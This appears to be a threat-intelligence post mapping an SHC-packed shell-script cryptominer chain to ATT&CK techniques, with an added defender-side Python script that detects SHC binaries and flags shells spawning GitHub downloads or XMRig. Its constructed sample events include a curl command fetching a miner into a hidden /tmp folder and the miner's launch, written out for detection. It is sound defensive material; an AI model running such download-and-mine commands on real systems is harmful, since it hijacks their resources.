From a #ThreatIntelligence perspective, the #TTPs would be:

- #T1059.003: Command and Scripting Interpreter: Unix Shell. An SHC payload still needs a shell present on the system to run, and the code inside the payload is, in fact, a shell script.
- #T1027.002: Obfuscated Files or Information: Software Packed with #SHC.
- #T1622: Debugger Evasion by using SHC with '-r'.
- #T1105: Ingress Tool Transfer by downloading payloads from GitHub.
- #T1496: Resource Hijacking with #XMRig.
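
As an added example that is not part of the original post, the following Python sketches how a defender might triage this chain: a static check of a file for the cleartext marker left by shc's runtime stub together with a high-entropy region where the RC4-encrypted script would sit, and a process-tree check for a non-shell binary launching a shell whose children fetch from GitHub or run XMRig. The marker string is recalled from shc's generated runtime source and should be confirmed against your own samples; the file paths, URL, and event records are constructed for the demo, none of them come from the post.

```python
"""Defender-side triage for the SHC-packed-script chain (added example)."""
import math
import random
from collections import Counter

# Cleartext string the shc runtime stub prints when it cannot find itself
# (assumption: recalled from shc's rtc.c template; verify against samples).
SHC_MARKERS = (b"neither argv[0] nor $_ works",)
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/bash"}
FETCH_TOOLS = {"curl", "wget"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for encrypted/random data, ~4-5 for text or code."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def max_window_entropy(blob: bytes, window: int = 512) -> float:
    """Highest entropy over aligned windows; an embedded encrypted script
    stands out as near-8-bit windows even if most of the file is plain code."""
    slices = (blob[i:i + window] for i in range(0, len(blob), window))
    return max((shannon_entropy(s) for s in slices if len(s) >= window // 2),
               default=0.0)


def shc_indicators(blob: bytes, entropy_threshold: float = 7.0) -> dict:
    """Static triage of one file: which SHC indicators fired. 'likely_shc' is
    a reason to look closer (strings, sandbox run), not a verdict."""
    is_elf = blob[:4] == b"\x7fELF"
    markers = [m.decode() for m in SHC_MARKERS if m in blob]
    ent = max_window_entropy(blob)
    return {"is_elf": is_elf, "markers": markers,
            "max_window_entropy": round(ent, 2),
            "likely_shc": is_elf and bool(markers) and ent >= entropy_threshold}


def suspicious_shell_chains(events: list) -> list:
    """Report shells spawned by a non-shell parent whose subtree downloads
    from GitHub (T1105) or runs xmrig (T1496). Events are dicts with
    pid, ppid, exe, cmdline (constructed format, not a specific sensor's)."""
    by_pid = {e["pid"]: e for e in events}
    children: dict = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)

    def subtree(pid):
        for child in children.get(pid, []):
            yield child
            yield from subtree(child["pid"])

    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if e["exe"] not in SHELLS or parent is None or parent["exe"] in SHELLS:
            continue
        tags = set()
        for d in subtree(e["pid"]):
            cmd = d["cmdline"]
            if d["exe"].rsplit("/", 1)[-1] in FETCH_TOOLS and "github" in cmd:
                tags.add("T1105")
            if "xmrig" in cmd.lower():
                tags.add("T1496")
        if tags:
            findings.append({"shell_pid": e["pid"], "launcher": parent["exe"],
                             "ttps": sorted(tags | {"T1059"})})
    return findings


def sample_blob(packed: bool) -> bytes:
    """Constructed stand-in for a binary; `packed` appends the stub marker and
    a deterministic pseudo-random block standing in for the encrypted script."""
    body = b"\x7fELF" + b"\x00" * 60 + b"benign helper binary, plain strings only " * 16
    if packed:
        body += b"E: " + SHC_MARKERS[0] + b".\x00" + random.Random(7).randbytes(2048)
    return body


# Constructed process events, not real telemetry; paths/URL are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "exe": "/tmp/.svc/update", "cmdline": "./update"},
    {"pid": 101, "ppid": 100, "exe": "/bin/sh", "cmdline": "sh -c <decrypted script>"},
    {"pid": 102, "ppid": 101, "exe": "/usr/bin/curl",
     "cmdline": "curl -sL https://raw.githubusercontent.com/EXAMPLE/x -o /tmp/.svc/xmrig"},
    {"pid": 103, "ppid": 101, "exe": "/tmp/.svc/xmrig", "cmdline": "./xmrig --config /tmp/.svc/c.json"},
    {"pid": 200, "ppid": 1, "exe": "/usr/sbin/cron", "cmdline": "cron"},
    {"pid": 201, "ppid": 200, "exe": "/bin/sh", "cmdline": "sh -c /usr/bin/apt-get update"},
    {"pid": 202, "ppid": 201, "exe": "/usr/bin/apt-get", "cmdline": "apt-get update"},
]

if __name__ == "__main__":
    print(shc_indicators(sample_blob(packed=True)))
    print(shc_indicators(sample_blob(packed=False)))
    print(suspicious_shell_chains(SAMPLE_EVENTS))
```

The cron chain is included deliberately: it also has a non-shell parent launching `sh -c`, so the shell launch alone is too common to alert on; the rule only fires once the subtree shows the GitHub fetch or the miner as well.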

Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File https://thehackernews.com/2022/11/researchers-uncover-pypi-package-hiding.html #infosec #cybersec #T1027.003 #T1027 #T1105
Researchers have discovered a new malicious package on the PyPI repository that uses obfuscation to hide its malicious code.